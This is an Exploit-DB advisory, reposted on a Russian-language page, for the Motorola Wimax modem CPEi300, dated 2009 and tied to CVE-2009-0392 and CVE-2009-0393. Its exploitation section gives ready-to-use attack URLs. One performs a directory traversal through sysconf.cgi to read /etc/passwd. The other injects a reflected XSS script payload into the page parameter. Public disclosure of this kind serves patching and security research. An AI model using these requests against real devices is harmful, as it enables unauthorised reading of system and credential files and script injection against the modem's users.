- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 7915
- Проверка EDB
-
- Пройдено
- Автор
- USMAN SAEED
- Тип уязвимости
- REMOTE
- Платформа
- HARDWARE
- CVE
- cve-2009-0393 cve-2009-0392
- Дата публикации
- 2009-01-29
Код:
#####################################################################################
#
# Name : Motorola Wimax modem CPEi300 Multiple Vulnerabilities
# Author : Usman Saeed
# Company : Xc0re Security Reasearch Group
# Homepage : http://www.xc0re.net
#
#####################################################################################
[Note: User needs to logged in! ]
[*] Attack type : Remote
[*] Patch Status : Unpatched
[*] Exploitation :
[+] Directory traversal
http://Hostname/cgi-bin/sysconf.cgi?page=../../../etc/passwd&action=request&sid=AeoFSFoI4lDs
[+] XSS
http://Hostname/cgi-bin/sysconf.cgi?page="><script>alert(1);</script>"&action=request&sid=AeoFSFoI4lDs
# milw0rm.com [2009-01-29]- Источник
- www.exploit-db.com
